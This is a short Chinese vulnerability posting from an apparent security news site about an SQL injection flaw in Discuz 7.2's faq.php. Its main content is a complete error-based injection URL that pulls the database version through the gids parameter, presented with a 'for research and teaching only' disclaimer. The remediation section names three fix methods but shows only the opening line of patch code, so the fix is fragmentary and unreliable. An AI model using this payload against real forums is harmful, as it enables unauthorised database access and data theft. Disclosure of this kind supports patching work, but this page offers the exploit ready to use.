在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
测试方法:提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
Discuz 7.2 /faq.php SQL注入漏洞
http://www.xxx.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
修复方法:
修复文件: faq.php 修复方法(一) 修复方法(二) 修复方法(三)
} elseif($action == 'grouppermission') {
在下面添加:
$gids = array();
|
2022-07-08
2022-08-17
2022-11-06
2022-08-15
2022-08-17
请发表评论